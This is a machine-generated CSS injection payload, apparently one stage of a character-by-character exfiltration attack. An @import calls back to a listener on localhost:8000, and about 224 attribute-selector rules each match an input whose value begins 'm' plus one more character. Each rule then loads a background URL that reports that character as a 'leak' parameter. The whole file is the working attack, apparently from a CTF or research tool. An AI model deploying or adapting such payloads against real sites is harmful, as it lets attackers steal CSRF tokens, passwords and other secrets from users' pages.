@import url("http://localhost:8000/?l=3");
input[value="m!"] {background: url("http://localhost:8000/?leak=!&q=0.0648187709099799");}
input[value="m\""] {background: url("http://localhost:8000/?leak=\"&q=0.25613828777246184");}
input[value="m#"] {background: url("http://localhost:8000/?leak=#&q=0.8921574664180869");}
input[value="m$"] {background: url("http://localhost:8000/?leak=$&q=0.5017024086402049");}
input[value="m%"] {background: url("http://localhost:8000/?leak=%&q=0.7633160178774092");}
input[value="m&"] {background: url("http://localhost:8000/?leak=&&q=0.8905030942689973");}
input[value="m'"] {background: url("http://localhost:8000/?leak='&q=0.8770860157637053");}
input[value="m("] {background: url("http://localhost:8000/?leak=(&q=0.4493172531965832");}
input[value="m)"] {background: url("http://localhost:8000/?leak=)&q=0.5035799653263333");}
input[value="m*"] {background: url("http://localhost:8000/?leak=*&q=0.2865378561030407");}
input[value="m+"] {background: url("http://localhost:8000/?leak=+&q=0.34027463996342444");}
input[value="m,"] {background: url("http://localhost:8000/?leak=,&q=0.13332780487610574");}
input[value="m-"] {background: url("http://localhost:8000/?leak=-&q=0.11774973763505803");}
input[value="m."] {background: url("http://localhost:8000/?leak=.&q=0.3325372228387673");}
input[value="m/"] {background: url("http://localhost:8000/?leak=/&q=0.05933403869951137");}
input[value="m0"] {background: url("http://localhost:8000/?leak=0&q=0.224303662847547");}
input[value="m1"] {background: url("http://localhost:8000/?leak=1&q=0.07063625978071375");}
input[value="m2"] {background: url("http://localhost:8000/?leak=2&q=0.4161139819287214");}
input[value="m3"] {background: url("http://localhost:8000/?leak=3&q=0.6234868529022606");}
input[value="m4"] {background: url("http://localhost:8000/?leak=4&q=0.29207482047541267");}
input[value="m5"] {background: url("http://localhost:8000/?leak=5&q=0.39256713114851505");}
input[value="m6"] {background: url("http://localhost:8000/?leak=6&q=0.34899702344388683");}
input[value="m7"] {background: url("http://localhost:8000/?leak=7&q=0.008568872632620295");}
input[value="m8"] {background: url("http://localhost:8000/?leak=8&q=0.8937518292727493");}
input[value="m9"] {background: url("http://localhost:8000/?leak=9&q=0.9269010007518346");}
input[value="m:"] {background: url("http://localhost:8000/?leak=:&q=0.8420673946885877");}
input[value="m;"] {background: url("http://localhost:8000/?leak=;&q=0.6347063568069");}
input[value="m<"] {background: url("http://localhost:8000/?leak=<&q=0.8784004615863337");}
input[value="m="] {background: url("http://localhost:8000/?leak==&q=0.35399974878799556");}
input[value="m>"] {background: url("http://localhost:8000/?leak=>&q=0.4340671390747981");}
input[value="m?"] {background: url("http://localhost:8000/?leak=?&q=0.3270863008863807");}
input[value="m@"] {background: url("http://localhost:8000/?leak=@&q=0.13032850898544868");}
input[value="mA"] {background: url("http://localhost:8000/?leak=A&q=0.41715391558043");}
input[value="mB"] {background: url("http://localhost:8000/?leak=B&q=0.8801819193911429");}
input[value="mC"] {background: url("http://localhost:8000/?leak=C&q=0.8094430447561747");}
input[value="mD"] {background: url("http://localhost:8000/?leak=D&q=0.6256276598600023");}
input[value="mE"] {background: url("http://localhost:8000/?leak=E&q=0.7291663716375372");}
input[value="mF"] {background: url("http://localhost:8000/?leak=F&q=0.15761889061196754");}
input[value="mG"] {background: url("http://localhost:8000/?leak=G&q=0.3512980725408985");}
input[value="mH"] {background: url("http://localhost:8000/?leak=H&q=0.3456396598828819");}
input[value="mI"] {background: url("http://localhost:8000/?leak=I&q=0.9294523083415098");}
input[value="mJ"] {background: url("http://localhost:8000/?leak=J&q=0.7143350722852206");}
input[value="mK"] {background: url("http://localhost:8000/?leak=K&q=0.11688133019001468");}
input[value="mL"] {background: url("http://localhost:8000/?leak=L&q=0.6267289252363968");}
input[value="mM"] {background: url("http://localhost:8000/?leak=M&q=0.08134277614383612");}
input[value="mN"] {background: url("http://localhost:8000/?leak=N&q=0.4572393891023654");}
input[value="mO"] {background: url("http://localhost:8000/?leak=O&q=0.9003897193463319");}
input[value="mP"] {background: url("http://localhost:8000/?leak=P&q=0.4704886704352147");}
input[value="mQ"] {background: url("http://localhost:8000/?leak=Q&q=0.7340328438881745");}
input[value="mR"] {background: url("http://localhost:8000/?leak=R&q=0.6810960801779122");}
input[value="mS"] {background: url("http://localhost:8000/?leak=S&q=0.4535301327271515");}
input[value="mT"] {background: url("http://localhost:8000/?leak=T&q=0.14957623402104603");}
input[value="mU"] {background: url("http://localhost:8000/?leak=U&q=0.4651030588665084");}
input[value="mV"] {background: url("http://localhost:8000/?leak=V&q=0.3904169869539431");}
input[value="mW"] {background: url("http://localhost:8000/?leak=W&q=0.8902467523825064");}
input[value="mX"] {background: url("http://localhost:8000/?leak=X&q=0.26307704840604984");}
input[value="mY"] {background: url("http://localhost:8000/?leak=Y&q=0.9163923798484532");}
input[value="mZ"] {background: url("http://localhost:8000/?leak=Z&q=0.24525923608950295");}
input[value="m["] {background: url("http://localhost:8000/?leak=[&q=0.6149865679162416");}
input[value="m\\"] {background: url("http://localhost:8000/?leak=\\&q=0.19640656612575347");}
input[value="m]"] {background: url("http://localhost:8000/?leak=]&q=0.3505407243498322");}
input[value="m^"] {background: url("http://localhost:8000/?leak=^&q=0.9241187341684733");}
input[value="m_"] {background: url("http://localhost:8000/?leak=_&q=0.05806483106101146");}
input[value="m`"] {background: url("http://localhost:8000/?leak=`&q=0.49373452934526973");}
input[value="ma"] {background: url("http://localhost:8000/?leak=a&q=0.350720417235014");}
input[value="mb"] {background: url("http://localhost:8000/?leak=b&q=0.6006571376866814");}
input[value="mc"] {background: url("http://localhost:8000/?leak=c&q=0.9923123971559724");}
input[value="md"] {background: url("http://localhost:8000/?leak=d&q=0.3824088570276507");}
input[value="me"] {background: url("http://localhost:8000/?leak=e&q=0.31882299312911844");}
input[value="mf"] {background: url("http://localhost:8000/?leak=f&q=0.14989819638100266");}
input[value="mg"] {background: url("http://localhost:8000/?leak=g&q=0.5455184325275739");}
input[value="mh"] {background: url("http://localhost:8000/?leak=h&q=0.3483635266840581");}
input[value="mi"] {background: url("http://localhost:8000/?leak=i&q=0.03427865843234956");}
input[value="mj"] {background: url("http://localhost:8000/?leak=j&q=0.5865669429624347");}
input[value="mk"] {background: url("http://localhost:8000/?leak=k&q=0.5465996280117429");}
input[value="ml"] {background: url("http://localhost:8000/?leak=l&q=0.39942189351546986");}
input[value="mm"] {background: url("http://localhost:8000/?leak=m&q=0.14865938574946957");}
input[value="mn"] {background: url("http://localhost:8000/?leak=n&q=0.5029914707235223");}
input[value="mo"] {background: url("http://localhost:8000/?leak=o&q=0.0626984001457851");}
input[value="mp"] {background: url("http://localhost:8000/?leak=p&q=0.5949520005117601");}
input[value="mq"] {background: url("http://localhost:8000/?leak=q&q=0.3285526991358405");}
input[value="mr"] {background: url("http://localhost:8000/?leak=r&q=0.10352320890335576");}
input[value="ms"] {background: url("http://localhost:8000/?leak=s&q=0.07187256401140485");}
input[value="mt"] {background: url("http://localhost:8000/?leak=t&q=0.7155751298251463");}
input[value="mu"] {background: url("http://localhost:8000/?leak=u&q=0.6920050417555981");}
input[value="mv"] {background: url("http://localhost:8000/?leak=v&q=0.5950141373626607");}
input[value="mw"] {background: url("http://localhost:8000/?leak=w&q=0.34793715640775336");}
input[value="mx"] {background: url("http://localhost:8000/?leak=x&q=0.5256962450319882");}
input[value="my"] {background: url("http://localhost:8000/?leak=y&q=0.6300128138788927");}
input[value="mz"] {background: url("http://localhost:8000/?leak=z&q=0.4014517341192727");}
input[value="m{"] {background: url("http://localhost:8000/?leak={&q=0.22063652499389663");}
input[value="m|"] {background: url("http://localhost:8000/?leak=|&q=0.43532867947078335");}
input[value="m}"] {background: url("http://localhost:8000/?leak=}&q=0.45840784944213553");}
input[value="m~"] {background: url("http://localhost:8000/?leak=~&q=0.40627474897456306");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.30573649759193655");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.2841700904025686");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.5451215606775919");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.39429916269547016");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.09602102833406034");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.8124095054671752");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.7883186376559035");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.571881597384456");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.9351214078659598");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.33771991971877435");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.7698290796046063");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.8180869051990676");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.3085750728262433");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.692378245132728");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.7828597555410628");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.3836147400489398");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.7334900031324849");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.38906931182416526");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.9732069175103393");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.7920757224938428");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.19484470930911746");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.948424202640997");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.7240499317947686");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.09961476456465124");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.1485860265054053");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.15886638999742853");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.49212258659210883");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.5082870482380204");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.6824574889190589");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.9898183130587119");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.4443668823880218");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.6207414712940766");}
input[value="m"] {background: url("http://localhost:8000/?leak=&q=0.9130440089960767");}
input[value="m "] {background: url("http://localhost:8000/?leak= &q=0.4976483806053291");}
input[value="m¡"] {background: url("http://localhost:8000/?leak=¡&q=0.11941020353509524");}
input[value="m¢"] {background: url("http://localhost:8000/?leak=¢&q=0.7370004739890628");}
input[value="m£"] {background: url("http://localhost:8000/?leak=£&q=0.13333791292986996");}
input[value="m¤"] {background: url("http://localhost:8000/?leak=¤&q=0.13469317803468828");}
input[value="m¥"] {background: url("http://localhost:8000/?leak=¥&q=0.11482264339210868");}
input[value="m¦"] {background: url("http://localhost:8000/?leak=¦&q=0.07694696967398351");}
input[value="m§"] {background: url("http://localhost:8000/?leak=§&q=0.7619317898721831");}
input[value="m¨"] {background: url("http://localhost:8000/?leak=¨&q=0.6459212987257252");}
input[value="m©"] {background: url("http://localhost:8000/?leak=©&q=0.01644177791240331");}
input[value="mª"] {background: url("http://localhost:8000/?leak=ª&q=0.8774294252607575");}
input[value="m«"] {background: url("http://localhost:8000/?leak=«&q=0.6757743562771179");}
input[value="m¬"] {background: url("http://localhost:8000/?leak=¬&q=0.12918559568937038");}
input[value="m­"] {background: url("http://localhost:8000/?leak=­&q=0.5754387559756178");}
input[value="m®"] {background: url("http://localhost:8000/?leak=®&q=0.35712062930343547");}
input[value="m¯"] {background: url("http://localhost:8000/?leak=¯&q=0.08444616520144299");}
input[value="m°"] {background: url("http://localhost:8000/?leak=°&q=0.09646005989293416");}
input[value="m±"] {background: url("http://localhost:8000/?leak=±&q=0.6078215051783058");}
input[value="m²"] {background: url("http://localhost:8000/?leak=²&q=0.8589776932998345");}
input[value="m³"] {background: url("http://localhost:8000/?leak=³&q=0.6540050905272488");}
input[value="m´"] {background: url("http://localhost:8000/?leak=´&q=0.37740738297304643");}
input[value="mµ"] {background: url("http://localhost:8000/?leak=µ&q=0.604359016134915");}
input[value="m¶"] {background: url("http://localhost:8000/?leak=¶&q=0.1561998222210399");}
input[value="m·"] {background: url("http://localhost:8000/?leak=·&q=0.3251780011578942");}
input[value="m¸"] {background: url("http://localhost:8000/?leak=¸&q=0.03207335795731314");}
input[value="m¹"] {background: url("http://localhost:8000/?leak=¹&q=0.5220719634289233");}
input[value="mº"] {background: url("http://localhost:8000/?leak=º&q=0.57053123540671");}
input[value="m»"] {background: url("http://localhost:8000/?leak=»&q=0.42329923580455575");}
input[value="m¼"] {background: url("http://localhost:8000/?leak=¼&q=0.801368467332269");}
input[value="m½"] {background: url("http://localhost:8000/?leak=½&q=0.1098982414541183");}
input[value="m¾"] {background: url("http://localhost:8000/?leak=¾&q=0.9103971290414192");}
input[value="m¿"] {background: url("http://localhost:8000/?leak=¿&q=0.9133395687097008");}
input[value="mÀ"] {background: url("http://localhost:8000/?leak=À&q=0.35361210882373917");}
input[value="mÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.7777857091554357");}
input[value="mÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.2971315238726766");}
input[value="mÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.19634737896679977");}
input[value="mÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.7903005043019793");}
input[value="mÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.464276686103021");}
input[value="mÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.28316600301377526");}
input[value="mÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.9043066434013904");}
input[value="mÈ"] {background: url("http://localhost:8000/?leak=È&q=0.1067399389993442");}
input[value="mÉ"] {background: url("http://localhost:8000/?leak=É&q=0.41933879938603225");}
input[value="mÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.49595676674539857");}
input[value="mË"] {background: url("http://localhost:8000/?leak=Ë&q=0.4925586609029431");}
input[value="mÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.9100204721850289");}
input[value="mÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.07910411259374461");}
input[value="mÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.7092920713138862");}
input[value="mÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.4110861609179728");}
input[value="mÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.7107882546368751");}
input[value="mÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.6629801539094065");}
input[value="mÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.9554442150784646");}
input[value="mÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.8943393364054699");}
input[value="mÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.22959669792260717");}
input[value="mÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.5859574377932557");}
input[value="mÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.7697598225305304");}
input[value="m×"] {background: url("http://localhost:8000/?leak=×&q=0.7751791988142802");}
input[value="mØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.5477481464304503");}
input[value="mÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.8168262266661304");}
input[value="mÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.009204239519849722");}
input[value="mÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.29391363960043737");}
input[value="mÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.15560375286784378");}
input[value="mÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.22784416438954702");}
input[value="mÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.9124131342692587");}
input[value="mß"] {background: url("http://localhost:8000/?leak=ß&q=0.9998585970306912");}
input[value="mà"] {background: url("http://localhost:8000/?leak=à&q=0.7964537478729523");}
input[value="má"] {background: url("http://localhost:8000/?leak=á&q=0.08434123819875361");}
input[value="mâ"] {background: url("http://localhost:8000/?leak=â&q=0.3574820657598894");}
input[value="mã"] {background: url("http://localhost:8000/?leak=ã&q=0.41806870869597335");}
input[value="mä"] {background: url("http://localhost:8000/?leak=ä&q=0.2289405650399825");}
input[value="må"] {background: url("http://localhost:8000/?leak=å&q=0.7903058490551862");}
input[value="mæ"] {background: url("http://localhost:8000/?leak=æ&q=0.7524665800256962");}
input[value="mç"] {background: url("http://localhost:8000/?leak=ç&q=0.43732613711804524");}
input[value="mè"] {background: url("http://localhost:8000/?leak=è&q=0.9413282582449292");}
input[value="mé"] {background: url("http://localhost:8000/?leak=é&q=0.6760303498709632");}
input[value="mê"] {background: url("http://localhost:8000/?leak=ê&q=0.02519978984351834");}
input[value="më"] {background: url("http://localhost:8000/?leak=ë&q=0.3186565662550058");}
input[value="mì"] {background: url("http://localhost:8000/?leak=ì&q=0.8288951475463591");}
input[value="mí"] {background: url("http://localhost:8000/?leak=í&q=0.9993689612094314");}
input[value="mî"] {background: url("http://localhost:8000/?leak=î&q=0.771837521427589");}
input[value="mï"] {background: url("http://localhost:8000/?leak=ï&q=0.3919152464654949");}
input[value="mð"] {background: url("http://localhost:8000/?leak=ð&q=0.0017012794704789336");}
input[value="mñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.2526710481238674");}
input[value="mò"] {background: url("http://localhost:8000/?leak=ò&q=0.9452403566411509");}
input[value="mó"] {background: url("http://localhost:8000/?leak=ó&q=0.8382553857835002");}
input[value="mô"] {background: url("http://localhost:8000/?leak=ô&q=0.5961275316952361");}
input[value="mõ"] {background: url("http://localhost:8000/?leak=õ&q=0.8986032150561196");}
input[value="mö"] {background: url("http://localhost:8000/?leak=ö&q=0.3840914553007033");}
input[value="m÷"] {background: url("http://localhost:8000/?leak=÷&q=0.8544377597665311");}
input[value="mø"] {background: url("http://localhost:8000/?leak=ø&q=0.3488223414381908");}
input[value="mù"] {background: url("http://localhost:8000/?leak=ù&q=0.08201135404682947");}
input[value="mú"] {background: url("http://localhost:8000/?leak=ú&q=0.1321840748610923");}
input[value="mû"] {background: url("http://localhost:8000/?leak=û&q=0.1376368007315305");}
input[value="mü"] {background: url("http://localhost:8000/?leak=ü&q=0.7655876596718687");}
input[value="mý"] {background: url("http://localhost:8000/?leak=ý&q=0.03746242390676757");}
input[value="mþ"] {background: url("http://localhost:8000/?leak=þ&q=0.9307064302113555");}
input[value="mÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.5904588346229771");}
